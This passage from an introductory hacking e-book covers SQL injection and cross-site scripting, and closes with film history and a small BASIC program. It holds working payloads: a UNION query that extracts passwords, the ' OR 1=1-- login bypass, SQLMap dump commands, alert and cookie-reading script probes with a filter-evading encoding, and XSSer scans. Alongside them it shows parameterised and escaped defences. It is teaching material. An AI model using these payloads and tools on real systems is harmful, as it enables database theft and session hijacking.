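        except sqlite3.OperationalError:
            return n - 1
    return None


# -1 matches no product, so only the UNION's row reaches the page.
UNION_PAYLOAD = "-1 UNION SELECT name, password, 3, 4 FROM users WHERE id = 1"


# --- the web form attack: login screen -------------------------------------
def login_vulnerable(db, username: str, password: str):
    sql = (f"SELECT id, name FROM users WHERE name = '{username}' "
           f"AND password = '{password}'")
    return db.execute(sql).fetchone()


def login_safe(db, username: str, password: str):
    sql = "SELECT id, name FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("injectable:", looks_injectable(db), "columns:", count_columns(db))
    print(product_vulnerable(db, UNION_PAYLOAD))           # John Doe's password
    print(product_safe(db, UNION_PAYLOAD))                 # []
    print(login_vulnerable(db, "' OR 1=1--", "anything"))  # first user wins
    print(login_safe(db, "' OR 1=1--", "anything"))        # None
```

Run it and compare the two pairs of functions: the only difference between vulnerable and safe is whether the value travels inside the SQL string or beside it, which is the whole lesson of this chapter in two lines.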

SQLMap
Performing SQL injection can be laborious work. Technically it is not
challenging, the concept and implementation are easy to understand, but if you
miss a vulnerability your search can go on for ages. As SQL injection
requires systematic work, tools have been developed to test a website for
vulnerabilities. Kali Linux comes with a tool called SQLMap that allows us to
perform a systematic SQL injection attack and specify what we want in return:
the entire database, just a few tables or even command shell access. A basic
SQLMap test looks as follows
root@kali:~# sqlmap -u "http://targetwebsite.com/index.php?product=101" --dump
The switch -u specifies that we have a target URL. The URL comes
immediately afterwards and contains an entry point into the underlying
database, in this case product=101; sqlmap tests every parameter it finds in
it. The switch --dump dumps the rows of the tables it can reach; with -D and
-T you limit it to one database and table, and --dump-all takes every
database it can see, which can run for hours and fills the target's logs.
SQLMap is a very diverse tool with many options to test for specific
vulnerabilities. A full description is beyond the scope of this text, but do
visit places such as stackoverflow.com to ensure that your own website
remains free of SQL injection by checking what the latest techniques are.
There are more types of SQL attacks, but I will cut this subject off as there is
more ground to cover elsewhere. If you’re keen to know more about SQL
Injection have a look at Piggy-Backed Queries, Blind attacks and Timing
attacks.
Compared to the tools we used during the three-step hacking methodology
(Reconnaissance, Scanning and Exploitation) SQL injection can be considered
technical. I hope you understand after this lesson that the underlying
weakness behind this type of attack lies in the web code that acts as an
interface between the user (a client using a browser) and the DB: it builds a
query by gluing text together instead of handing the database the user's
value as a separate parameter. To get a complete understanding of this topic
you will have to know the subtleties between different types of SQL database
(MySQL, PostgreSQL, SQLite, Microsoft SQL Server) and their dialects. Of
course a good feel for web programming is also necessary if you want to find
weaknesses and protect against them. Suggestions I would make are PHP and
JavaScript. If you want to get a good overview of how a web shop, its
databases and services work together then I recommend you start a blog. The
myriad of security issues you will encounter will serve as an excellent
source of experience.

Neuromancer
One of the first references in popular culture to hacking was in Neuromancer,
the 1984 science-fiction novel by William Gibson. In the story, a down on his
luck hacker named Case attempts to regain his skills by accepting a very
dangerous job. Neuromancer in many ways acted as prototype for the movie
The Matrix. Its influence can be felt in its theme (Artificial Intelligence) and its
main characters.

Neuromancer was one of the first novels that depicted hacking as a major
theme. Yet it also betrayed the writer's ignorance of what it was. In the
story, whenever Case wants to penetrate a secure system he uses an icebreaker
program. Such a program was depicted as an almost physical entity, not as
software. Yet despite this the term icebreaker has entered hacker parlance. A
movie adaptation of Neuromancer has been in development hell for decades; the
most recent news of a production dates from May 2015.

More Cyberpunk
Neuromancer has been influential along with Blade Runner since its release.
Together they define the Cyberpunk genre with its vivid depictions of urban
sprawls, mega-corporations and artificial intelligence. If you want to read
more Cyberpunk I can suggest Snow Crash by Neal Stephenson, Accelerando
by Charles Stross and the short story Cyberpunk by Bruce Bethke.

Chapter 7 Cross Site Scripting


Cross-site scripting or XSS is an attack in which a client-side script is
injected into a web page. Such a script is activated when an unsuspecting
visitor browses the page. Typically, the attacker posts JavaScript into the
web page as a comment on a news story or a thread of a discussion forum. Any
other internet user who visits that page automatically downloads the script,
which is then executed by their browser. The purpose of XSS attacks can be
manifold, but a popular target is a web administrator. By having the malicious
script send his cookies to the attacker, the attacker can gain access to the
website under the administrator's control. XSS attacks are more difficult to
execute compared to SQL Injection; at least they require some rudimentary
knowledge of languages such as JavaScript. However, XSS is a natural follow-up
topic after having learned the basics of SQL Injection. XSS is a popular
method of attack. A lot more websites are vulnerable to XSS than to SQL
Injection. Yet, determining this is not as easy.
For an XSS attack almost any input box on a web page is a point of
vulnerability. Besides comment boxes for articles and threads these
vulnerabilities also include the Login, Register and Search boxes, and any
URL parameter that the page echoes back. As you may guess, many websites do
have filters in place against XSS attacks. A potential attacker can encode
their script to allow it to be placed on the page regardless. That is where
the similarities to SQL Injection end. A basic script to test for
vulnerabilities is as follows.
<script>alert("XSS");</script>
This will create a little alert pop-up if the code slips through the filter.
An attacker has thus managed to determine whether a website is vulnerable
without actually performing an attack, though it will set off alarm bells with
anyone who happens to browse that page. Below I have another example you can
try; it spells out XSS from character codes so that the word itself never
appears in the input, which defeats filters that only look for the literal
string.
<script>alert(String.fromCharCode(88,83,83))</script>
With an XSS attack it must not be forgotten that the website itself isn't the
true target, the clients that visit the site are. The holy grail of XSS is
obtaining a session cookie that will allow a hacker in through the website's
login. If the cookie belonged to a client with administrator rights, then the
username and password login is bypassed when the hacker uses the cookie
himself. After the hacker has managed to retrieve the cookie, which is the
hard part, he only needs to copy it into his browser and navigate to that
website to gain access, without inputting a username or password! Note that
a cookie set with the HttpOnly flag cannot be read by script at all, which is
why that flag is the standard defence for session cookies. In the following
paragraph methods for retrieving session cookies are discussed.
With the code below a pop-up is created showing the cookie. Of course if
clients see such a pop-up they will become suspicious. You need to retrieve
cookies surreptitiously, for example by putting them in the address of an
image the script loads from a server you control, and be able to store them.
<script>alert(document.cookie);</script>
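The probe logic above is easy to reproduce without a browser. The following is an added example, not code from the original text: a comment page rendered once the vulnerable way and once with proper HTML escaping, the check that tells a reflected probe apart from a harmlessly escaped one, and a decoder for the String.fromCharCode trick so that a filter sees what the browser will see. The page template and comment text are constructed.

```python
import html
import re

# Added example, not from the original page: stored-comment rendering two
# ways, the reflection check behind the alert() probe, and a decoder for
# String.fromCharCode payloads. PAGE and the probes are constructed.

PAGE = ('<html><body><h1>Comments</h1>'
        '<div class="comment">{comment}</div></body></html>')
PROBE = '<script>alert("XSS");</script>'
ENCODED_PROBE = '<script>alert(String.fromCharCode(88,83,83))</script>'


def render_vulnerable(comment: str) -> str:
    """Drops the comment straight into the HTML: its tags become markup."""
    return PAGE.format(comment=comment)


def render_safe(comment: str) -> str:
    """Escapes <, >, &, and quotes so the browser shows the comment as text."""
    return PAGE.format(comment=html.escape(comment, quote=True))


def reflects_unescaped(page_html: str, probe: str) -> bool:
    """True when the probe appears byte-for-byte in the page. An escaped copy
    (&lt;script&gt;...) does not count: the browser will not execute it."""
    return probe in page_html


CHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")


def decode_fromcharcode(script: str) -> str:
    """Rewrite String.fromCharCode(88,83,83) as "XSS" so that a filter which
    only matches the literal word is not fooled by the numeric form."""
    def repl(match):
        chars = "".join(chr(int(n)) for n in match.group(1).split(","))
        return '"' + chars + '"'
    return CHARCODE.sub(repl, script)


def blocked_by_naive_filter(script: str) -> bool:
    """A filter that only looks for the literal word XSS, case-insensitively:
    the kind of filter the character-code payload walks straight past."""
    return "xss" in script.lower()


if __name__ == "__main__":
    print(reflects_unescaped(render_vulnerable(PROBE), PROBE))   # True
    print(reflects_unescaped(render_safe(PROBE), PROBE))         # False
    print(blocked_by_naive_filter(ENCODED_PROBE))                # False
    print(blocked_by_naive_filter(decode_fromcharcode(ENCODED_PROBE)))  # True
```

The point of the last two functions is that blacklisting strings is a losing game: JavaScript has more ways of spelling a word than any filter will anticipate, whereas escaping on output, as render_safe does, works regardless of what the input looks like.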

Malicious URLs
The malicious scripts used by hackers can also be placed in a URL, in a
parameter that the page reflects back into its HTML without escaping it. As
soon as a user clicks the link the script is executed and the XSS attack is
under way. Injecting such a script can be as simple as pasting the code
behind a legitimate URL. Of course most people aren't stupid. Users know not
to click on a link they do not recognise, especially if they see one in an
email. However, the malicious URL can be hidden behind a shortening service
such as TinyURL. This type of attack is known as reflected or "first order"
XSS, as opposed to the stored attack described above, where the script lives
in the page itself.

Grabber
As mentioned before XSS attacks are popular. Most websites are to a degree
vulnerable to such an attack. However, determining such vulnerabilities can be
time consuming. Grabber is a scanner that will do most of the grunt work for
you. It will scan designated websites, portals and forums. But be careful. Even
with moderately sized websites Grabber will have difficulty. With larger
websites it becomes impractical. As such it may be necessary for a hacker to
browse their target and narrow down to parts of the website that look
promising for an XSS attack.
root@kali:~# grabber --spider 1 --sql --xss --url
http://targetwebsite.com
As you can see from this sample command Grabber is easy to use. The
switches have the following meaning.
--spider: the entire website should be crawled, in this case to a depth of 1.
--sql: we also want to check for SQL injection vulnerabilities. It's a
gimme, but you can leave it out if you want to speed up Grabber.
--xss: switch to check for XSS vulnerabilities.
--url: designate the target website.
Grabber is a staple within Kali Linux. Its use goes beyond XSS vulnerability
detection: it also checks for SQL injection, finds backup files and analyses
JavaScript code. If you want to see the complete list of switches just enter
'grabber -h' into the Terminal.

XSSER
One of the best tools to perform an XSS attack that is built into the
standard Kali distribution is XSSer. The tool lets the user detect possible
XSS vulnerabilities of a website and exploit them. Acunetix keeps a
deliberately vulnerable website online for testing scanners,
testasp.vulnweb.com. The tutorial below will use that as an example, but any
website flagged by Grabber will do.
Below is an example attack command. As you can see XSSer has no shortage of
switches.
root@kali:~# xsser -u 'http://testasp.vulnweb.com' -g 'Search.asp?tfSearch=' --proxy 'http://127.0.0.1:8118' --referer '666.666.666.666' --user-agent 'correct audit' --Fuzz -s
Meaning behind the switches
-u: the target URL.
-g: send the payload in the given parameter using the GET method; XSSer
appends its test strings after tfSearch=.
--proxy: route the requests through a proxy; 127.0.0.1:8118 is the Privoxy
port that a Tor setup commonly listens on.
--referer: set the HTTP Referer header (by default none is sent).
--user-agent: set the HTTP User-Agent header instead of the default spoofed
one.
--Fuzz: run the fuzzing vectors to check whether the input is sanitized.
-s: print statistics at the end of the run.
If you find XSSer intimidating to use in the Terminal then switch over to
the GUI application with the following command.
root@kali:~# xsser --gtk
XSS attacks are difficult to complete, but the above explanation should be
enough. Try to get to know tools such as Grabber and XSSer in-depth. A lot of
these tools are similar, but you should focus on those with a large support
community.
https://rjlipton.wordpress.com/2009/02/27/where-are-the-movies-on-pnp/
http://www.usc.edu/dept/molecular-science/fm-sneakers.htm

EXTRA:
WarGames
The murky beginnings of hacking
Back in the early 80s the first personal computers had only just started to
seep through into society. Chances were you didn't have one; neither did your
friends or your neighbors. However, your teacher might have one and the
acquaintance working for that big tech firm might have one at home. People did
know that computers could communicate through the telephone. The 1983
movie WarGames is about David Lightman, played by Matthew Broderick, a
teenage kid and a bit of a recluse who uses his computer to hack into NORAD
and play war games with the simulator WOPR. Of course David doesn't know
he hacked into NORAD. David thinks it is a tech firm with military
connections somewhere in Sunnyvale, California. Joshua, the real name given
to WOPR by its original designer, accepts David's offer to play a game, one
entitled 'Global Thermonuclear War'. The game is in fact a simulation of a
World War 3 scenario. The techies of Strategic Air Command at NORAD can't
tell the difference and think that David's attempt to defeat Joshua is an
actual Soviet attack. It is only later that David learns on the news that the
US military was placed on high alert.
Before long David is in over his head as the FBI arrests him. He tries to
convince them in vain that the WOPR simulation is not real and that the nuclear
missiles shouldn’t be launched. Only after escaping the clutches of the FBI and
consulting Joshua’s original designer Dr. Stephen Falken, played by John
Wood, does he manage to convince the authorities it has all been a ghastly
mistake.
WarGames is very much a child of its time. Though everything that happens
would have been possible in 1983 when the movie was released, at least in
theory. The spectacular NORAD set at the time cost over 1 million dollars to
build and certainly helped in creating the notion that hacking could be
dangerous beyond just being a nuisance. Director John Badham readily admits
that he tapped into the common fears and misunderstandings people had about
computers in the early 80s. Some of those fears persist. One example was
when hacker Kevin Mitnick (The Condor) was held in solitary confinement
because prosecutors convinced a judge that by merely whistling into a phone
he could launch a nuclear missile[13]. Kevin Mitnick has written several books
on his hacking exploits, especially those relating to social engineering, which
are still relevant today.
The hacking methods used by David Lightman have their basis in phone
phreaking, that is, abusing the telephone network the US had at the time to
get free calls and to find out who was behind a certain number. Unlike the
phone phreakers of the 60s, David uses an automated process with his personal
computer. Much of the technical detail is now obsolete, as is phone phreaking
in general. However, the methods David uses to obtain information about his
targets are still hacker 101, such as wardialing: having the computer dial
every number in a block and noting which ones answer with a modem tone.
Though phreaking has its murky origins in the 1950s, its golden age came when
Joe Engressia (Joybubbles) learned how to whistle the right tone to seize
control of the long-distance switches. He used this skill to sell
long-distance phone calls to friends and acquaintances. Similarly, John
Draper discovered that the plastic whistle included as a free gift in boxes of
Cap'n Crunch cereal produced the same tone. John Draper later on used the
handle Captain Crunch. The tone that was required was 2600 Hz. John Draper
also constructed what is known as a Blue Box, a multi-frequency tone
generator that automated the process by reproducing the very signalling tones
that AT&T's own switching equipment used.
Figure 58. Steve Jobs and Steve Wozniak
After Draper got into difficulties with the law he taught his skills in building
blue boxes to Steve Wozniak and Steve Jobs, who together would cofound Apple
Computer just a few short years later. In the late 70s Draper would also write
a BASIC cross-compiler for the Apple 2. At around the same time Microsoft
cofounders Bill Gates and Paul Allen developed Altair BASIC for the Altair
8800, one of the first personal computers, developed in 1974 and sold by mail
order. The computer used by David Lightman in WarGames is an IMSAI
8080[14], a clone of the Altair 8800.
Figure 59. Paul Allen and Bill Gates, Altair BASIC tape to the right
Early personal computers such as those developed by members of the
Homebrew Computer Club used variants of BASIC. The language was
developed by John G. Kemeny and Thomas E. Kurtz in 1964. Since then the
language has fallen out of favor, with C, its variants and Java becoming
dominant. BASIC will mostly be remembered as the language that started the
personal computer revolution, when in the mid-1970s a critical mass of
programmers familiar with the language created the first programs.

Figure 60. Altair clone as used in the movie WarGames
Now BASIC is mostly used by Microsoft as Visual Basic.NET[15]. For Linux
only LibertyBASIC has a working port[16], though the website Run BASIC
offers an online interpreter. Below you can see a small program written in
Run BASIC. Use it, expand it, play with it a little to get the feel of the old
BASIC language!
PRINT "Greetings Professor Falken."
INPUT "Shall we play a game? "; answer$
' jump to the game on a yes answer, otherwise say goodbye and stop
IF answer$ = "y" OR answer$ = "yes" THEN [guessLoop]
PRINT "Fine"
END

[guessLoop]
INPUT "Type a number between 1 and 10: "; number
' keep asking until the player hits the secret number, 7
IF number < 7 THEN [guessLoop]
IF number > 7 THEN [guessLoop]
PRINT "Good guess"
END

Since the 1980s the telephone system has become digitized, which has made
phreaking attacks of this kind impossible. However, its legacy continues in
hacking culture. Two magazines on hacking and counter-culture continue to
exist today: 2600: The Hacker Quarterly[17] and PHRACK. The former is still
going strong and is edited by Emmanuel Goldstein (Eric Corley). 2600 is also
famous for regularly organizing hacker conferences: the HOPE series, a
conference held every two years in Manhattan. The next one, HOPE XI, should
be scheduled for 2016.
A Final note
Dear reader, after reading through all three parts of this introductory book you
will have learned a lot. Don’t be daunted if you don’t remember a lot. Just
remember you read it somewhere and that you understood it at the time. I
deliberately organized this book so it can also act as a reference text. If you do
intend to pursue the three topics described then there is nothing more useful
than a place where you can find information. At least, until the training wheels
come off.

November 6, 2016
Amsterdam, Netherlands

This E-book was published by SciFiEmpire.net
All rights reserved


[1] http://www.linfo.org/ps.html
[2] http://www.antonis.de/qbebooks/gwbasman/tron.html
[3] Balagurusamy, E. (1997). Programming in BASIC. Tata McGraw-Hill.
[4] http://hackforums.net/showthread.php?tid=4169018&highlight=powershell
[5] http://karwin.blogspot.nl/2012/11/c-pointers-explained-really.html
[6] http://www.thegeekstuff.com/2011/12/c-pointers-fundamentals/
[7] https://triviahappy.com/articles/welcome-to-the-net-every-webpage-from-the-1995-movie-the-net
[8] http://www.nytimes.com/1994/07/19/science/personal-computers-microsoft-s-new-system-promises-to-fix-glitches.html
[9] http://ericsink.com/Browser_Wars.html
[10] http://starringthecomputer.com/feature.html?f=15
[11] http://www.wired.com/insights/2013/04/moocs-and-shopping-carts-tracking-digital-educations-evolution/
[12] http://www.mediafire.com/file/5tvpocv5gijo0dc/darkc0de.lst
[13] http://www.cnet.com/news/social-engineering-101-mitnick-and-other-hackers-show-how-its-done/
[14] http://www.imsai.net/movies/wargames.htm
[15] https://en.wikipedia.org/wiki/Visual_Basic_.NET
[16] http://www.libertybasic.com/
[17] http://www.2600.com/
